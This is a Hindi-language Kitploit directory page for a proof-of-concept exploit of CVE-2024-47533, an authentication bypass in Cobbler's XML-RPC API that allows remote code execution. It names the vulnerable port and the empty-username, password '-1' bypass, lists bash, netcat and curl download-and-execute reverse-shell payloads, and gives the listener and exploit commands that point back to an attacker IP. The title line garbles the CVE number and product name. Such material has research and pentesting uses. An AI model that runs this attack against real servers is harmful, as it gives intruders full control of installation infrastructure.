Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-47533 — CVE-2025-47533 Clobber RCE का PoC | Kitploit
उपकरण/GitHubGitHub/zs1n/cve-2024-47533
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubzs1n/cve-2024-47533

CVE-2024-47533

CVE-2025-47533 Clobber RCE का PoC

रिपॉजिटरी देखें
111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-47533 - Cobbler XMLRPC प्रमाणीकरण बाईपास RCE शोषण

Cobbler में प्रमाणीकरण बाईपास के माध्यम से महत्वपूर्ण रिमोट कोड निष्पादन

PoC कार्यान्वयन।


सारांश

Cobbler, एक Linux इंस्टॉलेशन सर्वर जो नेटवर्क इंस्टॉलेशन वातावरण की तीव्र स्थापना को सक्षम बनाता है, में संस्करण 3.0.0 से 3.2.3 और 3.3.7 तक (लेकिन इनमें शामिल नहीं) एक प्रमाणीकरण भेद्यता है। फ़ंक्शन utils.get_shared_secret() हमेशा -1 लौटाता है, जिससे कोई भी खाली उपयोगकर्ता नाम ('') और पासवर्ड -1 के साथ Cobbler XML-RPC इंटरफ़ेस से कनेक्ट हो सकता है। यह नेटवर्क पहुँच वाले हमलावर को Cobbler सर्वर का पूर्ण नियंत्रण प्राप्त करने देता है। यह भेद्यता संस्करण 3.2.3 और 3.3.7 में ठीक की गई है।


🛠 तकनीकी विवरण

भेद्यता utils.get_shared_secret() फ़ंक्शन में साझा गुप्त (shared secret) के अनुचित हैंडलिंग के कारण होती है, जो हमेशा -1 लौटाता है, प्रभावी रूप से प्रमाणीकरण को बायपास करता है। यह किसी भी नेटवर्क उपयोगकर्ता को खाली क्रेडेंशियल्स के साथ Cobbler के XMLRPC इंटरफ़ेस से कनेक्ट होने और मनमाना कमांड निष्पादित करने देता है।


🔥 संवेदनशील एंडपॉइंट

http://<target>:25151/ — Cobbler का XMLRPC API एंडपॉइंट


💥 नमूना पेलोड

शोषण स्क्रिप्ट विभिन्न रिवर्स शेल पेलोड का समर्थन करती है, जिनमें शामिल हैं:

  • Bash रिवर्स शेल
  • Netcat शेल (nc)
  • Curl डाउनलोड और निष्पादन

प्रमाण-अवधारणा (PoC)

लिसनर तैयार करना

अपनी मशीन पर Netcat लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 4444

🚀 शोषण चलाना

शोषण स्क्रिप्ट CVE-2024-47533.py चलाएँ।

root@kitploit:~
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

पैरामीटर

-t : लक्ष्य (उदाहरण: -t http://1<IP_SERVICE>:<PORT>)

-l: स्थानीय IP (उदाहरण: -l 10.10.11.80)

-p : पोर्ट <LOCAL_PORT> (उदाहरण: -p 4444)

--payload: पेलोड (bash, curl, nc) (उदाहरण: --payload bash)

💻 सफल रिमोट शेल एक्सेस

सफल निष्पादन पर, रिवर्स शेल लिसनर से वापस कनेक्ट होगा, जिससे हमलावर को सर्वर तक रिमोट एक्सेस प्राप्त होगा।

टूल डाउनलोड करें